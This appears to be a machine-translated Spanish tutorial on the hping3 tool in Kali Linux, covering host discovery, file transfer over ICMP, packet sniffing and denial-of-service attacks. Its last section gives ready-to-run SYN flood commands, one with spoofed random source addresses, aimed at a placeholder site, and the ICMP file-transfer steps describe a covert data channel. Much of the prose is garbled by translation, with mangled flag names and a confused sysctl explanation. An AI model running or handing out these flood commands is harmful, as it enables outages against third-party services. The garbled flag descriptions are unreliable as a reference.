Tutoriales

Hping3: auditoría de red, DOS y DDOS

Hping3 es una herramienta de línea de comandos que nos permite analizar mensajes TCP/IP en la red.Además, Hping3 puede ensamblar paquetes de red, lo cual es útil para que los probadores de penetración realicen el descubrimiento de dispositivos y servicios, así como también realicen operaciones ilegales como ejecutar negación de servicio (negación de servicio) ataque.

Hping3 pre instalado kali linuxEsto es útil para probar la red.

  1. Descubrimiento de host en la red.
  2. Huella digital del dispositivo host para determinar el servicio.
  3. Rastrear el tráfico de la red.
  4. Denegación de servicio (DoS).
  5. transferencia de archivos.

En el mundo real, muchos servidores y dispositivos tienen las respuestas ICMP deshabilitadas por motivos de seguridad. Podemos usar Hping3 para sondear puertos en el sistema de destino para forzar una respuesta ICMP.

Primero, usamos la utilidad ping para enviar una solicitud de ping en el servidor localhost.

ping sin respuesta

En la captura de pantalla anterior, podemos ver que no recibimos ninguna respuesta del objetivo. Los novatos pueden pensar que el objetivo está desconectado y pueden seguir adelante.

Si usamos Hping3 para sondear un puerto específico enviando paquete SYN obligará al objetivo a revelarse.

sudo hping3 -S 192.168.225.48 -p 80 -c 2

Aquí usamos el paquete SYN especificado -S bandera, y use el puerto especificado 80 -pág 80Después de aplicar el comando anterior, obtenemos la respuesta que se muestra en la siguiente captura de pantalla:

respuesta hping3

En la captura de pantalla anterior, podemos ver que hemos recibido una respuesta exitosa del objetivo. Esto significa que nuestras metas están abiertas.

También podemos enviar archivos usando hping3. Por ejemplo, acabamos de enviar un archivo de texto desde nuestra máquina virtual Linux Mint a nuestra máquina host Kali Linux. Primero, iniciamos el oyente con el siguiente comando en la máquina donde queremos descargar el archivo:

sudo hping3 -1 192.168.225.29 -9 signature -I wlan0

Aquí el indicador -1 y la dirección IP utilizada para ICMP es la IP del remitente. El indicador -9 se usa para iniciar el oyente y -I se usa para seleccionar la interfaz de red. Luego se iniciará el oyente, como podemos ver en la siguiente captura de pantalla:

Modo monitor Hping3

Después de iniciar el modo de escucha aquí, podemos enviar archivos desde otra máquina usando:

sudo hping3 -1 192.168.225.29 -e signature -E hping3.txt -d 2000

Aquí, el indicador -e se usa para dar la firma, el indicador -E se usa para enviar datos de archivo y el indicador -d se usa para el tamaño de los datos.

El siguiente screencast muestra cómo funciona.

También podemos usar hping3 como rastreador de paquetes de red. Aquí también podemos usar el modo de escucha de hping3, que intercepta y guarda todo el tráfico que pasa a través de la interfaz de red de nuestra máquina.

Primero tenemos que permitir esto (sin comentar)

net.ipv4.conf.all.accept_redirects=0

existir /etc/sysctl.conf documento. Se muestra en la siguiente captura de pantalla:

permitir en la configuración

Por ejemplo, para interceptar todo el tráfico que contenga firmas HTTP, podemos aplicar el siguiente comando:

sudo hping3 -9 HTTP -I wlan0

En la captura de pantalla a continuación, podemos ver la salida.

captura de paquetes hping3

En la captura de pantalla anterior, podemos ver que hping3 está capturando paquetes en la interfaz de red wlan0.

Podemos usar hping3 para ataques DoS (inundación SYN) Denegación de servicio. Un comando simple se vería así:

sudo hping3 -S --flood -V www.examplesite.com

aquí -S Indica que estamos usando paquetes SYN, – inundación es enviar paquetes lo más rápido posible.

También podemos hacer esta mezcla usando algunas funciones avanzadas.

sudo hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE

aquí -C indicador para el recuento de paquetes (podemos subirlo o bajarlo según nuestros requisitos) -d La bandera es el tamaño de los datos, -w es establecer el tamaño de la ventana, -pags bandera se utiliza para especificar el puerto de destino, –rand-fuente Las banderas se utilizan para aleatorizar la fuente.

Esto es Cómo usamos hping3 en nuestro sistema Kali LinuxPodemos leer más sobre hping3 aquí. Hping3 es una gran herramienta para probar redes y también es muy popular.

Descargo de responsabilidad: Este tutorial es para consejos educativos. Atacar otros dispositivos que se consideren delito. No apoyamos. Esto es para difundir la conciencia de ciberseguridad. Si alguien hace algo ilegal, solo esa persona será responsable de ello.

¿Te gustan nuestros artículos?Cerciorarse Síganos superior Gorjeo y GitHub, donde publicamos actualizaciones de artículos.Únete a nosotros KaliLinuxEn familia, únete a nosotros grupo de telegramasEstamos trabajando arduamente para construir una comunidad para Linux y la seguridad de la red.Para cualquier cosa, siempre estamos felices de ayudar a todos. Área de comentariosComo sabemos, nuestra sección de comentarios siempre está abierta a todo el mundo.Leemos cada comentario y siempre respondemos.

LEER  Cliente REST de Pineapple MK7: flujo de trabajo de piratería WiFi

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba